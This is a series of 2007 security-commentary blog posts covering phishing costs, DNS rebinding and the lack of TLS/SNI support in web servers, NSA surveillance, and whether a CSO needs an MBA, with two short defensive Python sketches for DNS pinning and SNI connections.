    The answer I saw in banking and smart card monies, to continue in Lynn's context, was two-fold. Firstly, nobody there was counting the costs. Everyone in the smart card industry was focussed on how cheap the smart card was, but not the full costs. Everybody believed the salesmen. Nobody in the banks thought to ask what the costs of the readers were (around 10-100 times that of the card itself...) or the other infrastructure needed, but banks aren't noted for their wisdom, which brings us to the second point.

    Secondly, it was pretty clear that although the bank knew a little bit about transactions, they knew next to nothing about what happened outside their branch doors. Getting into smart card money meant they were now into retail as opposed to transactions. In business terms, think of this as similar to a supermarket becoming a bank. Or v.v. That's too high a price to pay for the supposed security that is entailed in the smart card. Although Walmart will look at this question differently, banks apparently don't have that ability.

    It is impossible to predict whether your average MBA would spot these things, but I will say this: They would be pass/fails in my course, and there would not be anything else on the planet that the boss could do to spot them. Which you can't say for the combined other certifications, which would apparently certify your CSO to spot the difference between 128 bit and 1024 bit encryption ... but sod all of importance.

    Posted by iang at 09:16 AM | Comments (1) | TrackBack

    Threatwatch: US-SSNs melt for $50 in MacArthur Park

    So, having read the HBR case I just wrote about ("nobody else reads the original material they quote, why should I?"), I discovered this numbers gem on the very last page:

    Perhaps the most worrying indicator is that the criminal industry for information is growing. I can go to MacArthur Park in Los Angeles any day of the week and get $50 in exchange for a name, social security number, and date of birth. If I bring a longer list of names and details, I walk away a wealthy man.

    $50 for ID sets seems very high in these days of phishing, but that may be the price for hand-to-hand delivery and a guarantee of quality. Either way, a data point.

    What is also striking is the mention of a physical marketplace. Definitely a novelty! The only thing I know about that place is that it melts in the dark, but it could be that MacArthur Park is simply too large to shut down.

    Posted by iang at 06:20 AM | Comments (0) | TrackBack

    August 27, 2007

    Learning from Iraq and Failure

    Financial Cryptographers are interested in war because it is one of the few sectors where we face an aggressive attacker (as opposed to a statistical failure model). For this reason, current affairs like Iraq and Afghanistan are interesting, aside from their political aspects (September is crunch time!).

    John Robb points to an interview with Lt. Col. John Nagl on how the New Turks in Iraq (more formally known as General Petraeus and his team) have written a new manual for the theater, known as the Counterinsurgency Field Manual.

    We last had a counter guerrilla manual in 1987 but as an army we really avoided counterinsurgency in the wake of Vietnam because we didn't want to fight that kind of war again. Unfortunately the enemy has a vote. And our very conventional superiority in war-fighting is driving our enemy to fight us as insurgents and as guerrillas rather than the kind of war we are most prepared to fight, which is conventional tank-on-tank type of fighting.

    ...

    You still have to be able to do the fighting. A friend of mine, when he found out I was writing [the book], wrote to me from Iraq and said

    "remember, Nagl, counterinsurgency is not just the thinking man's war ... It's the graduate level of war."

    Because you still have to be able to do the war fighting stuff. When I was in [Iraq] I called in artillery strikes and air strikes, did the fighting stuff. But I also spent a lot of time meeting with local political leaders, establishing local government, working on economic development.

    You really have to span the whole spectrum of human behavior. We had cultural anthropologists helping on the book, economists, information operation specialists. It's a very difficult type of war, it's a thinking person's kind of war. And it's a kind of war we are learning and adapting and getting better at fighting during the course of the wars in Iraq and Afghanistan.

    I copied those parts in from the interview because they stress what we see in FC, but check out the interview as it is refreshing. Here are the parallels:

    • The Gung-ho warriors enter the field.
    • And are defeated.
    • Institutions are not able to respond to the new threats until they have shown themselves incapable of forcing old threat models on the enemy.
    • The battle is won, or at least fought, with brains, not brawn.
    • Still, the "warfighting" or general security stuff never goes away.
    • When we are dealing with an asymmetric or "new" attack, multiple disciplines enter into the discussion to analyse the balance between fighting and other strategies.
    • The new strategy emerges, but only after the losses to both our ground forces and our old generals.

    The parallels with today's Internet situation seem pretty clear. How long do we go on fighting the attackers before the New Turks come in and address the battle from a holistic, systemic viewpoint?

    Posted by iang at 07:11 PM | Comments (0) | TrackBack

    August 23, 2007

    Threatwatch: Numbers on phishing, who's to blame, the unbearable loneliness of 4%

    Jonath over at Mozilla takes up the flame and publishes lots of stats on the current state of SSL, phishing and other defences. Headline issues:

    • Number of SSL sites: 600,000 from Netcraft
    • Cost of phishing to US: $2.1 billion.
    • Number of expired certs: 18%
    • Number of users who blame a glitch in the browser for popups: 4%

    I hope he keeps it up, as it will save this blog the job it has been doing for many years :) The connection between SSL and phishing can't be overstressed, and it's welcome to see Mozilla take up that case. (Did I forget to mention TLS/SNI in Apache and Microsoft? Shame on me....)

    Jonath concludes with this odd remark:

    If I may be permitted one iota of conclusion-drawing from this otherwise narrative-free post, I would submit this: our users, though they may be confused, have an almost shocking confidence in their browsers. We owe it to them to maintain and improve upon that, but we should take some solace from the fact that the sites which play fast and loose with security, not the browsers that act as messengers of that fact, really are the ones that catch the blame.

    You, like me, may have read that too quickly, and thought that he suggests that the web sites are to blame, with their expired certs, fast and loose security, etc.

    But, he didn't say that; he simply said those are the ones that *are* blamed. And that's true: there are lots and lots of warnings out there, like campaigns to drop SSL v2 and to stop sites doing phishing training, and other things ... The sites certainly catch the blame, that's definitely true.

    But, who really *deserves* the blame? According to the last table in Jonath's post, the users don't really blame the site as much as might be expected: 24%. More are unsure and thus wise, I say: 32%. And yet more imagine an actual attack taking place: 40%.

    That leaves 4% who suspect a "glitch" in the browser itself. Surely one lonely little group there; I wonder if they misunderstood what a "glitch" is... What is a "glitch," anyway, and how did it get into their browsers?

    Posted by iang at 09:06 AM | Comments (0) | TrackBack

    August 16, 2007

    DNS Rebinding, and the drumroll of SHAME for MICROSOFT and APACHE

    Tonight, we have bad news and worse news. The bad news is that the node is yet again the scene of imminent collapse of the Internet as we know it. The worse news is that the fix that could have fixed it ... is still not deployed. The no-news is that we warned about this years ago. It's still not done.

    Dan Kaminsky, a hacker of some infamy and humour, gave a son-of-black-hat talk on DNS Rebinding. What this means is that when you go to a site that has a malicious applet or Flash or something, then your node becomes controlled (that's your PC, desktop, laptop, etc) for attacks on other nodes.

    Now, I don't fully understand the deal ... and details were difficult to follow ... but it is something to do with weird things with DNS that allow a malicious site to download bad code into your applet/flash/javascript weakened browser. Then, that code literally takes over and turns your node -- your PC -- into an internal attack-dog under someone else's whistle. Dan uses the example of the printer down the hall, but in finance circles this is the internal derivatives accounting system down the hall, already smoking from too much recent attention.

    Yes, Firefox and IE are both victims.

    The DNS details were scary and voluminous but rest on a basically sound claim: DNS isn't secure, and that we know. It is possible to hand the requestor all sorts of interesting information, and that interesting information can then be used to trick through firewalls, IDS, etc, and compromise the machine, because it is "authoritative" and it comes from the right machine, your machine, your soon-to-be-owned machine.
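
    One classic mitigation is DNS pinning: resolve a name once, remember the answer, and refuse to follow a later, different answer. A toy sketch of the idea (my illustration, not what any browser actually ships):

    import socket

    _pins = {}   # hostname -> first IP ever resolved for it

    def pinned_connect(host, port=80):
        ip = socket.gethostbyname(host)
        pinned = _pins.setdefault(host, ip)   # pin on first resolution
        if pinned != ip:
            raise RuntimeError("possible DNS rebinding: %s moved %s -> %s"
                               % (host, pinned, ip))
        return socket.create_connection((ip, port))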

    Curiously, the object of Dan's project is much more grandiose than that. He's looking to do a bunch of weird measurements on TCP, using this DNS rebinding to bootstrap in and take over the TCP connection. Yeah, MITM, if you spotted the clue.

    (I'll repeat that, Dan claims to be doing MITMs on TCP!)

    To summarise the raw claims (again, given my limited understanding):

    • attack bypasses all firewalls,
    • can be used to own your router,
    • bypasses IDS
    • your browser needs to strike a malicious Flash, Java applets or javascript in some variants (needs sockets, Firefox delivers sockets through javascript??)
    • Works on the 2 major browsers
    • A simplified version has been seen in the wild, by bad guys
    • No DNS fix, but there are some short term patches?

    Fixes: No easy fixes, just temporary patches. DNS is operating as normal; it never was secure anyway, and the modes and tricks used are essential for a whole lot of stuff. Likewise, Flash etc, which seems to have no more security than Windows did in 2002, isn't going to be fixed fully any time soon. (Dan mentioned he is waiting on Adobe to fix something before full disclosure, but that runs out as someone else is about to publish the same results.)

    • The systemic fix: There is only one mode, and it's secure. Ok, I just had to add that in...
    • The practical fix: Go TLS, everywhere.
    • Timeframe: 3 years.
    • Excuse: read on...

    Here's the old worse news: Dan stated, as near as I can recall it:

    "TLS solves the problem completely, but TLS does not scale to the net, because it does not indicate the host name. This puts more of an indictment on the standards process and on TLS than anything else, we've had TLS for years now, and we still can't share virtual hosts on TLS."

    Yes, it's our old friend TLS/SNI (ServerNameIndication), a leprechaun-like extension that converts TLS from a marginal marketing differentiator at ISPs into a generally deployable solution.
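
    For those who haven't met it: SNI simply puts the desired hostname into the TLS ClientHello, so one IP address can serve many certificates. In today's Python it is a single argument; a sketch, with a hypothetical virtual host name:

    import socket, ssl

    host = "vhost1.example.net"   # hypothetical name-based virtual host
    ctx = ssl.create_default_context()
    with socket.create_connection((host, 443)) as raw:
        # server_hostname is what places the SNI extension in the ClientHello
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            print(tls.version(), tls.getpeercert()["subject"])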

    SNI is available in Firefox 2.0 and later. Thanks to Mozilla, they actually started a project on this called SSL v2 MUST DIE because of its ability to help in phishing (same logic, same fix, same sad sorry story). It is fixed in IE7, but only on Vista, so that's short thanks to Microsoft. Opera's got it, and they might have been the first.

    Yet...

    TLS/SNI is not available in Apache's httpd nor in Microsoft's IIS.

    Indeed, I tried last year to contact the httpd team and plead for it. Nothing; it's as if they don't exist. Mozilla were even prepared to pay these guys to fly & fix, but we couldn't find anyone to talk to. Worse, they have had the code for yonks. The code builds, at least the gnutls version. The code works.

    I got proof that Microsoft's team exists, and that they also have no plans to secure the Internet this year.

    Shame, the very shame! Apache's httpd team and Microsoft's IIS team are now going to watch 3 years of pain and suffering, for the want of a little fix that is so old that nobody can recall when it was added to the standard.

    (OK, that's the last I heard. There might be updates in the shame. You understand that it isn't my day job to get you to save the net. It is however your day job, Microsoft team, and night job, Apache team, and you can point out current progress in the comments or on your blog or in the very code, itself. Please, we beg you. Save our net.)

    Addendum: a rebinding patch! And some more from the department of snails.

    Posted by iang at 06:59 PM | Comments (5) | TrackBack

    August 10, 2007

    Susan Landau on threats to the USA: don't forget Pogo

    The Washington Post, in the person of Susan Landau, lays out in clearer terms where USA cyber-defence is heading:

    The immediate problem is fiber optics. Until recently, telecommunication signals came through the air. The NSA used satellites and antennas to pick up conversations of foreigners talking to other foreigners. Modern communications, however, use fiber; since conversations don't go through the air, the NSA wants to access communications at land-based switches.

    Because communications from around the world often go through the United States, the government can still get access to much of the information it seeks. But wiretapping within the United States has required a FISA search warrant, and the NSA apparently found using FISA too time-consuming, even though emergency access was permitted as long as a warrant was applied for and granted within 72 hours of surveillance.

    Avoiding warrants for these cases sounds simple, though potentially invasive of Americans' civil liberties. Most calls outside the country involve foreigners talking to foreigners. Most communications within the country are constitutionally protected -- U.S. "persons" talking to U.S. "persons." To avoid wiretapping every communication, NSA will need to build massive automatic surveillance capabilities into telephone switches. Here things get tricky: Once such infrastructure is in place, others could use it to intercept communications.

    Grant the NSA what it wants, and within 10 years the United States will be vulnerable to attacks from hackers across the globe, as well as the militaries of China, Russia and other nations.

    Landau chooses the evil foreign hacker as her bogeyman. This is understandable if we recall who her audience is. The threat however is closer to home; to paraphrase Pogo, Americans have not yet met their enemy, but he is you.

    A basic assumption of security was that the NSA was historically no threat to any person, only to nations. Intel info was closely guarded, and any breach of it was a national security breach; we the people were far better protected by the battle against foreign spies than by anything else. No Chinese wall, then, more a great wall-of-China around secret tracts of Maryland.

    Now that wall-of-China has been torn down and replaced by trade-grade Chinese walls. Breaching Chinese walls simply requires the right contact, the right excuse, the right story. Since 9/11, intel info and trade info are one and the same, and it is now reasonable, expected even, that hundreds of thousands of new readers of data can trawl through criminal databases, intel summaries, background reports and the like.

    For illumination, see the SWIFT battle. The problem wasn't that the NSA was reading the SWIFT traffic, it had been doing that for decades. The problem was the burgeoning spread of the data, as highlighted by events: the Department of Justice now felt it reasonable, indeed required, to get in on the act. Pundits will argue that it was a governed programme, but its secret governance was a setup for more breaches.

    It wasn't the first, nor the second, and it wasn't going to be the last. If we had to choose between the evil Chinese hacker and the enemy-who-is-us, I for one would take the evil Chinese hacker every time. We can deal with the external enemy; we know how. But the internal enemy, the enemy who is us, he is the destruction of civil society, and there is no army to fight that threat.

    Posted by iang at 10:56 AM | Comments (1) | TrackBack

    August 09, 2007

    Mozilla gets proactive about browser security?

    This article reports that Mozilla are now proactive on security. This is good news. In the past, their efforts could be described as limited to bug patching and the like. Reactive security, in other words, which is what their fuzzer is:

    Mozilla has been using an open-source application security testing tool, known as a fuzzer, for JavaScript to detect and fix dozens of security bugs in Firefox, Mozilla director of ecosystem development Window Snyder said Thursday at the Black Hat USA 2007 conference in Las Vegas. The JavaScript fuzzer found 280 bugs in Firefox, 27 of which were exploitable.

    Now Mozilla is making that JavaScript fuzzer available to anyone who wants to use it, and it'll be followed later this year by fuzzers for the HTTP and FTP protocols.

    "The FTP and HTTP protocol fuzzers act like fake servers that send bad data to sites," Snyder told InformationWeek.The HTTP fuzzer emulates an HTTP server to test how an HTTP client handles unexpected input. The FTP fuzzer likewise tests how an FTP client handles unexpected data.

    Now however there is at least one person employed directly on thinking about security in a proactive sense:

    Expect Firefox 3 to include new phishing and malware protection, extended validation certificates, improved password management, and a security user interface.

    One could criticise this all as too little, too late, too "interests-driven". But changing cultures to think, really think, about security is hard. It doesn't happen overnight, and it takes years at least. Consider that Microsoft has been working since 2003 to make this change, and the evidence that their product is secure is not here yet; that shows how hard it is.

    Posted by iang at 08:05 AM | Comments (0) | TrackBack

    Shock of new Security Advice: "Consider a Mac!"

    From the "where did you read it first?" department, here comes an interesting claim:

    Beyond obvious tips like activating firewalls, shutting computers down when not in use, and exercising caution when downloading software or using public computers, Consumer Reports offered one safety tip that's sure to inflame online passions: Consider a Mac.

    "Although Mac owners face the same problems with spam and phishing as Windows users, they have far less to fear from viruses and spyware," said Consumer Reports.

    Spot the difference between us and them? Consumer Reports is not in the computing industry. What it suggests about where helpful security advice comes from will haunt computing psychologists for years to come.

    For amusement, count how many security experts will pounce on the ready excuse:

    "Because Macs are less prevalent than Windows-based machines, online criminals get less of a return on their investment when targeting them."

    Of course if that's true, it becomes less so with every Mac bought.

    Can you say "monoculture!?"



    The report itself from Consumer Reports seems to be for subscribers only. For our ThreatWatch series, the article has many juicy numbers:

    U.S. consumers lost $7 billion over the last two years to viruses, spyware, and phishing schemes, according to Consumer Report's latest State of the Net survey. The survey, based on a national sample of 2,000 U.S. households with Internet access, suggests that consumers face a 25% chance of being victimized online, which represents a slight decline from last year.

    Computer virus infections, reported by 38% of respondents, held steady since last year, which Consumer Reports considers to be a positive sign given the increasing sophistication of virus attacks. Thirty-four percent of respondents' computers succumbed to spyware in the past six months. While this represents a slight decline, according to Consumer Reports, the odds of a spyware infection remain 1 in 3 and the odds of suffering serious damage from spyware are 1 in 11.

    Phishing attacks remained flat, duping some 8% of survey respondents at a median cost of $200 per incident. And 650,000 consumers paid for a product or service advertised through spam in the month before the survey, thereby seeding next year's spam crop.

    Perversely, insecurity means money for computer makers: Computer viruses and spyware turn out to be significant drivers of computer sales. According to the study, virus infections drove about 1.8 million households to replace their computers over the past two years. And over the past six months, spyware infestations prompted about 850,000 households to replace their computers.

    Posted by iang at 07:36 AM | Comments (0) | TrackBack

    Verisign reminder of what data security really means

    From the 'poignant reminder' department, Verisign lost a laptop with employee data on it.

    The employee, who was not identified, reported to VeriSign and to local police in Sunnyvale, Calif. that she had left her laptop in her car and had parked her car in her garage on Thursday, July 12. When she went out the next morning, she found that her car had been broken into and the laptop had been stolen.

    Possibly a targeted theft?

    The thing is, this can happen to anyone. Including Verisign, or any CA, or any security company. This can happen to you, and probably will, regardless of your policies (which in this case included keeping employee data off laptops and using encrypted drives).

    The message to take away from this is not that Verisign is this week's silly sausage, or that their internal security is lax. This can and will happen to anyone. Instead, today's message is that there is a gap between security offerings and security needs so large that crooks are driving trucks through it every day, and have been for 4 years.

    I estimated a billion dollars a year in 2004 or so from phishing alone, and now conservative estimates in another post today put it at around 3bn per year. (I say conservative because Lynn posts other numbers that are way higher.) That truck is carrying over 8 million dollars a day!

    Still not convinced? Consider this mistake that the company made:

    In its employee letter, VeriSign offered a year of free credit monitoring from Equifax for any affected individual, and recommended placing fraud alerts on credit accounts to watch for signs of fraud or identity theft.

    If Verisign can offer a loss-leader zero-margin recovery product to the victims of their own failure, what hope has the rest of the computing industry?

    Posted by iang at 07:23 AM | Comments (0) | TrackBack

    August 05, 2007

    Doom and Gloom spreads, security revisionism suggests "H6.5: Be an adept!"

    The doom and gloom in the security market spreads. This time it is from Richard Bejtlich who probably knows his stuff as well as any (spotted at Gunnar's 1raindrop). After a day at Black Hat, the expensive high-end "shades of illegal" conference in security, he concludes:

    • Existing defenses are absolutely ineffective against current attacks....
    • Detecting current attacks in "real time" is increasingly difficult, if not impossible....
    • The average Web developer and security professional will never be able to counter these attacks....

    Note how he includes the security professional in there. Yup. The problem is that the knowledge space has ballooned and nobody can keep up; Internet security is now a game that is way too broad for anyone to really cover it all.

    Even before the current "war on everyone", you still had several problems with the security industry: a lack of understanding of the business, which fed into poor choices that were generally too expensive, and a tendency to "best practices" -- purchased products, because brands deliver CYA as well as high prices, etc etc. Over time, industry discovered it made more money if it didn't hand the money over to security ... until 2003, that is, when phishing found its lure.

    If, then, you can't find someone to do it for you, you have to do it yourself. This is what I called Hypothesis #6: "It's your job. Do it." But exactly what does that mean?

    #6.5 You need to be an adept in many more aspects

    In all probability you will need to be adept -- well versed if not expert -- in all aspects, right up to user activity. This will stretch you away from the deep cryptographic and protocol tricks that you are used to as you simply won't have time for all that. But an ability to bridge from user needs all the way across to business needs, and then down to crypto bits is probably much more valuable than knowing yet another crypto algorithm in depth.

    The FC7 thesis is that you need to know Rights, Accounting, Governance, Value and Finance as well as Software Engineering and Cryptography. You need to know these things in some depth not to use them but to avoid using them! And, more particularly, avoid their hidden costs, by asking the difficult questions about the costs that nobody else dare recognise.

    Perhaps the best example was the decision by Microsoft to stop coding and start training all their coders in security practices. Not just some of them, all of them!

    Where this leaves the conventional security professional is perhaps an open question. I would prefer to say that instead of prescribing solutions and sometimes supplying them, he would shift to training and guiding. This would involve a different emphasis: if you assessed that an IDS might help, in the past you sold an IDS. Now, however, you would assess whether the team leader could cope with an IDS, point her in that direction, and mentor the assessment of the tool by the entire team. If they aren't up to that, then you have another problem.

    Posted by iang at 06:51 PM | Comments (1) | TrackBack

    August 04, 2007

    National insecurity - all your packets are belong to US

    A secret court ruled the US Government's wiretapping programme illegal, and the US Government claimed that revealing this fact disclosed confidential activity. So illegality is OK if it's confidential? No, not before the courts, last I heard; but we'd need a lawyer to explain why the courts won't accept secrecy as a defence for illegality, and why we shouldn't either.

    In similar news, it was revealed that then-Attorney General Ashcroft stated unequivocally, from his sickbed, that the programme was illegal. He was immediately replaced by the current incumbent, Alberto Gonzales, whose testimony some in Congress now wonder amounts to perjury.

    Other news suggested that what was going on was the desire to start wiretapping (read: real-time direct feed to the NSA) of all the trans-US traffic. FISA, apparently, "requires a warrant to monitor calls intercepted in the United States, regardless of where the calls begin or end." A fair enough metric, 30 years ago.

    Yet, if I call from Britain to Japan, chances are fair that the call is routed through the US, because that's where most of the fibre is. The hub & spoke effect is much more important for the Internet, where a much higher percentage of traffic is routed through the USA. Indeed, pretty much everything Internet-related is spoked around the US hub: Hosting, IP#s, startups, skills, etc.

    Why not tap that, as it doesn't involve the inconvenience of US citizens? A good question: from an intelligence point of view, it's just another Black Chamber operation, updated for the 21st century, and it's easy pickings.

    There are many reasons to oppose this, such as "We just can't suspend the Constitution for six months," but the one I like best is the simplest: if the NSA gets direct feeds of all fibre communications trans-shipping through the US, then two things will happen: Firstly, by laws of economics not Congress, this tapping will eventually include all US-terminated conversations.

    Secondly, it might kick the rest of the world into gear and start responding to the basic threat of aggressive and persistent listening. Perversely, one might suggest that we shouldn't oppose the US, as we need a validated threat to focus our security efforts.

    Indeed, if one surmises that the US government have been told their programmes are illegal, one can question whether the NSA is not already tapping all trans-shipped traffic, and is probably not adequately filtering the locally terminated traffic.

    All your packets are belong to US. You have been warned: Deploy more crypto, guys.

    Posted by iang at 09:41 AM | Comments (3) | TrackBack

    July 29, 2007

    more on firing your MBA-less CSO

    BTW, if you think firing the CSO's boss is harsh, then consider that others do not think so:

    The United Kingdom's information commissioner is calling on chief executives to take the security of customer and staff information more seriously.

    "The roll call of banks, retailers, government departments, public bodies and other organizations which have admitted serious security lapses is frankly horrifying," Richard Thomas wrote in a report. "How can laptops holding details of customer accounts be used away from the office without strong encryption? How can millions of store card transactions fall into the wrong hands?"

    The Information Commissioner's Office (ICO) received almost 24,000 inquiries and complaints concerning personal information, and it prosecuted 16 individuals and organizations in the past 12 months, according to its annual report for 2006 and 2007.

    Another way of thinking of this is to look at these sorts of questions:

    • does security have ROI, and so what?
    • what other part of the business has the same problem with ROI?
    • What is the difference between marketing, sales, and strategy, and which should the CSO be involved in?
    • Should HR use automated psych tests for job interviews for security consultants, and why?
    • Does the security group prefer product placement, endorsement, word-of-mouth, or a straight Superbowl ad ... and why?

    Click on if you want some answers. Now, it's not necessary to be able to answer these right off, but you do need to know what they mean.

    Answers:

    • Yes, but it suffers from GIGO -- too hard to predict what the attacker will do to the security product, so not possible to predict the results with any accuracy.
    • Advertising.
    • That depends on how robust the security is. If highly robust, then strategy. If not robust, then marketing and sales, to ensure careful disclaimers.
    • No, because they aren't sufficiently accurate, and they require feedback from the individual to be meaningful -- an individual you haven't employed as yet. If they are used, it means HR will operate as a filter against diversity and the company will suffer from groupthink. This will then create security blind spots.
    • Word-of-mouth contributes security advantages; the others have little effect on security directly, but will probably work faster in mainstream markets for standard products.

    OK, so all of those are debatable. But that's the point: unless you can debate them on the same turf as your other managers, you're lost. You can't contribute security if you don't understand each manager's area well enough to contribute.

    Posted by iang at 03:05 PM | Comments (5) | TrackBack

    July 28, 2007

    Know Your Enemy: Scott McNealy on security theater

    People who don't know about security, but talk about it, are dangers to security. Those who are in the security field can determine the difference between 'security theater' and real security ... but unfortunately those outside are often swayed by simple and easy sales messages.

    Scott McNealy did the privacy world a huge favour by saying "Privacy is dead, get over it." Perhaps he's also doing another favour by issuing a wake-up call to the world:

    McNealy said that to overcome the "efficiency tax" travelers are facing at airports with long lines, it will make sense to begin adopting identity cards that are smart-card-enabled. These can be supplemented by biometric identification such as a thumbprint scanner, all of which can be done more efficiently than "50 security guards."

    ...

    McNealy said it would be better to know who is on a plane or in a mall where a terrorist strikes, adding that it wouldn't be necessary to know who is buying what.
    He said he realizes that his views might be interpreted as a way to sell more hardware and software at Sun. But, "I'm a parent, and I care about my kids," he said.

    McNealy said he envisions the day when parents implant smart chips behind the ears of their children for identification purposes. "My dog has a chip [implant], and it's interesting [that] we treat a dog better than our kids," he said.
    Several attendees said they thought implants seemed extreme or at least something that Americans won't want to consider for years to come. But they all agreed that technology will have to play a bigger role in security, especially at airports.

    After his talk, McNealy met briefly with reporters and was asked if he seriously intended to endorse chip implants. "We are going to move to smart cards and chips ... so we feel safe," he said.

    It sounds more like a DHS press release than anything else. The detailed problem with all that McNealy says is that we know smartcards and chips do not deliver security (again, see Lynn in comments on rollouts of smartcard systems) but they can dramatically destroy privacy ... which is a reduction of security. Yet, high-profile organisations like Sun and DHS will continue to press security theater as it is good for their growth.

    Posted by iang at 08:04 AM | Comments (6) | TrackBack

    July 24, 2007

    If your CSO lacks an MBA, fire one of you

    Thinking a bit about the theme of security v. management [1,2, 3], here is today's thesis:

    The CSO should have an MBA.

    As a requirement! Necessary (but maybe not sufficient) for the Chief Security Officer job.

    That being a slightly contentious issue, as most of y'all CSOs out there don't have an MBA, the onus is on me now to prove it, or swallow humble pie. Well, this is the blog for being years ahead of the trends, so let's get on with it then.

    Consider some factors.

    1. No understanding. Frequently heard are the brickbats that accuse managers of doing stupid things. See if you can find a non-security guy doing or saying something sensible! It's quite simple for us to state why this happens: non-security people don't understand what the security guys are talking about.
    2. No Voice. It's been grudgingly accepted for some years now that security people are not listened to. In the sense that your chief security dude can rabbit on about any threat or any project and get nowhere.
    3. Failure. It is a no-brainer that today's security field is a mess. Windows botnets, Linux attack platforms, spam and phishing, MITBs, unholy virus company alliances... these things run rampant and we can't do much about them. Worse, those that predicted it were ignored, those that sold stuff did well, those that rode the wave from flavour to favour did best. We now have a permanent and industrialised degree of fraud that belongs to the security industry, in place, which Lynn suggests in comments is better than drugs. Oh happy day, full employment for the CSO.

    Maybe, 1 and 2 are opposite sides to the same coin, and spending that coin got us to 3. Which brings us to this point: we can pretty much assume that there is a huge gulf of understanding between the security world and the business world.

    In order to fix all this, we have to generate understanding.

    (Either that, or switch off the systems. Now, the security guys sometimes say exactly that, but the business guys don't listen, so we're back to looking at the real problem.)

    Assume then the basic failure is one of understanding. We can do one of several things: train all the managers in security, train all the security people in business, or put in the middle a liaison who knows both security and business.

    Let's kill the two easy options: Managers by definition know a little of everything, enough to be dangerous, and do not get trained up much in anything except whatever their original skill was. And for your average manager, those days of early skill training are over.

    The second easy option is training the security people. But that's a hopeless task. Firstly, consider where they come from: generally IT, with little background in business (cryptography is worse, the military somewhat better, for business exposure at least). Secondly, it's a full-time job keeping up with just security, let alone learning about business. The reverse difficulty applies to the managers, option 1 above.

    Which leaves option #3: the liaison. Now, we can pretty easily see by process of elimination that the liaison has to be the CSO. So the question reduces to: what does the CSO need to be a successful liaison between security and business?

    He needs the full capability to talk to the managers, and the security people. The latter means he *is* a security person, because by the law of guruism, to gain the respect of the gurus, you have to be one of them. The former means he *is* a manager.

    But we need to go one step further. Because security cuts across all areas of the business in the way that HR, marketing, auditing, and customer support do ... and transport, printing, sales, and cleaning do not ... the security honcho needs to understand a lot more of the business areas than the average manager does.

    See the difference? Because security is up against an aggressive attacker, because attacks can occur anywhere, and because the solutions strike across all areas, the problems are broad and complex. If our CSO hasn't the skills to talk to each manager, at her level, on her turf, not his, then he's lost.

    There are only two ways that I can think of to get the knowledge needed to talk at the same level as all of the other managers: either you go fast-track, which means being shoved from department to department, 1-2 years in each, or you pick it up in a condensed package called a Masters of Business Administration. The former is done, but it takes decades in either a very large corporation or the military. Scratch that as an option, as it also means our CSO won't be up to scratch as a security person. Hence, we are left with one option:

    The CSO needs an MBA.

    QED.

    (Which will still cost you a minimum of one year; full-time MBAs are generally 10 to 22 months, part-time ones up to 36 months ... but those are implementation details.)

    (Addendum, for scoring easy points against the above logic, Disclosure: I have an MBA :-) ) If you want to read more of the devil's advocacy, try:

    Posted by iang at 11:25 AM | Comments (8) | TrackBack

    July 23, 2007

    Threatwatch: how much to MITM, how quickly, how much lost

    It costs $500 for a kit to launch an MITM phishing attack. (Don't forget to add labour costs at 3rd world rates...)

    David Franklin, vice president for Europe, Middle East and Africa, told IT PRO that these sites are proliferating because they are actually easier for hackers to set up than traditional 'fake' phishing sites, because they don't even have to maintain a fake website. He also said man-in-the-middle attacks defeat weak authentication methods including passwords, internet protocol (IP) geolocation, device fingerprinting, cookies and personal security images and tokens, for example.

    "A lot of the attacks you hear about are just the tip of the iceberg. Banks often won't even tell an affected customer that they have been a victim of these man-in-the-middle attacks," said Franklin, adding that kits that guide cybercriminals through setting up a man-in-the-middle attack are now so popular they can be bought for as little as $500 (£250) on the black market now.

    He also said "man-in-the-browser" attacks are emerging to compete in popularity with the middleman threat.

    A couple of interesting notes from the above: it is now accepted that MITM is what phishing is (in the form mentioned above, the original email form, and the DNS form). These MITMs defeat the identity protection of SSL secure browsing, a claim made hereabouts first, and one that is still widely misunderstood: this is significant because SSL is engineered to defeat MITMs, but it only defeats internal or protocol MITMs, and cannot stop the application itself being MITM'd. This typical "bypass attack" has important economic ramifications, such that SSL is now shown to be too heavy-weight to deliver value, unless it is totally free of cost and setup.

    Secondly, note that the mainstream news has picked up the MITB threat (also reported and documented here first). It's still rare, but in the next 6 months, expect your boss to ask what it's about, because he read it on Yahoo.

    More juicy threat modelling numbers:

    Analysts at RSA Security early last month spotted a single piece of PHP code that installs a phishing site on a compromised server in about two seconds.

    And....

    Despite efforts to quickly shut sites down, phishing sites averaged a 3.8-day life span in May, according to the Anti-Phishing Working Group, which released its latest statistics on Sunday.

    Data from market analyst Gartner released last month showed that phishing attacks have doubled over the last two years.

    Gartner said 3.5 million adults remembered revealing sensitive personal or financial information to a phisher, while 2.3 million said that they had lost money because of phishing. The average loss is US$1,250 per victim, Gartner said.

    In the past (June 2004: 1, 2), I've reported that phishing costs around one billion per year. Multiply those last two Gartner numbers -- 2.3 million victims at $1,250 each -- and we get around $2.9 billion, or roughly a billion a year over the last three years. Still a good rule of thumb then.

    Posted by iang at 06:39 AM | Comments (4) | TrackBack

    June 20, 2007

    SWIFT breach -- class action suit, can we rely on government for privacy of financial data?

    It's been a while since SWIFT was in the news, but they're back! Chris points out that a class action suit has been permitted against them in Federal court:

    In his 20-page opinion, Judge Holderman rejected SWIFT's defense that it acted in good faith by relying on government subpoenas. Any claim to "unfettered government access to the bank records of private citizens" is "constitutionally problematic", the court said.

    In refusing to dismiss the case, Judge Holderman noted reports that "SWIFT officials were aware that their disclosures were legally suspect, but they nevertheless continued to supply database information to the U.S. government."

    This might follow the progress of the illegal wiretapping case before Judge Diggs. There, the state said "state secrets" and the Judge responded "it's not a secret anymore..."

    Which means illegal behaviour can be tried. Why are we so interested? Behaviour that is "probably illegal" and "definitely deceptive" needs to be documented, because it might support a finding that the US government cannot be expected to secure the privacy of any data. This applies most easily to foreigners and their SWIFT data, but customarily, what applies to foreigners soon applies to locals (laws aside).

    For example, Todd reports that the French are having trouble stopping their parliamentarians from passing their secrets across on Blackberries:

    Members of the new French cabinet have been told to stop using their BlackBerries because of fears that the US could intercept state secrets. The SGDN, which is responsible for national security, has banned the use of the personal data assistants by anyone in the president’s or prime minister’s offices on the basis of “a very real risk of interception” by third parties.

    The ban has been prompted by SGDN concerns that the BlackBerry system is based on servers located in the US and the UK, and that highly sensitive strategic information being passed between French ministers could fall into foreign hands. A confidential study carried out two years ago by Alain Juillet, the civil servant in charge of economic intelligence, found that the BlackBerry posed “a data security problem”.

    Mr Juillet noted that US bankers would prove their bona fides in meetings by first placing their BlackBerries on the table and removing the batteries.

